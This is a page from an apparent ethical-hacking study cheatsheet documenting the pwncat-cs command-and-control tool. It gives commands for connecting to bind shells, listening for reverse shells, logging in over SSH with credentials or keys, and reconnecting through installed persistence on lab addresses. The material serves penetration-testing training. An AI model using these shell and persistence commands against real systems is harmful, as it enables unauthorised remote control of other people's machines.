β˜„οΈ
Certified Ethical Hacker
  • πŸ‘‰Certified Ethical Hacker Cheatsheet
  • 🐧General Settings
    • πŸ“¦APT Package Manager
    • πŸ€–Cron
    • 🦊Firefox Extensions
  • ✍️Research & Report
    • πŸ’ Obsidian
    • 🎒Notion
    • 🐼Pwndocs
  • πŸ”ŽInformation Gathering
    • πŸ“›NSLookup // Dig // Whois
    • πŸ“œNmap
    • πŸ–₯️DNS Enumeration
  • πŸ”¬Vulnerability Assessment
    • 🌐Web Assessment
      • Nikto
      • WPScan
    • πŸ•ΈοΈNetwork Assessment
      • OpenVAS
      • Nessus
  • βš”οΈExploitation
    • πŸ”΄Metasploit
    • 🐍MSFVenom
    • πŸ‘οΈSearchsploit
    • 🐚Revshells
    • 🐱Netcat
      • 😾Pwncat-CS
    • πŸ’ͺBrute Force
    • πŸ”’Wi-FI
  • ⚜️Post Exploitation
    • β›ΊPersistence
    • πŸ“File Transfer
      • Netcat
      • SMB
      • Python
      • Updog
      • Linpeas
    • πŸ•³οΈTunnelling
Powered by GitBook
On this page
  1. Exploitation
  2. Netcat

Pwncat-CS

Python Command & Control through Netcat

PreviousNetcatNextBrute Force

Last updated 1 year ago

Usage

# Connect to a bind shell
pwncat-cs connect://10.10.10.10:4444
pwncat-cs 10.10.10.10:4444
pwncat-cs 10.10.10.10 4444

# Listen for reverse shell
pwncat-cs bind://0.0.0.0:4444
pwncat-cs 0.0.0.0:4444
pwncat-cs :4444
pwncat-cs -lp 4444

# Connect via ssh
pwncat-cs ssh://user:password@10.10.10.10
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10

# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222
# Reconnect utilizing installed persistence
#   If reconnection fails and no protocol is specified,
#   SSH is used as a fallback.

pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
pwncat-cs 10.10.10.10

Change Platform to Windows

pwncat-cs -m windows 10.10.10.10 4444
pwncat-cs -m windows -lp 4444
βš”οΈ
🐱
😾
Basic Usage - pwncat documentation
Logo
https://github.com/calebstewart/pwncat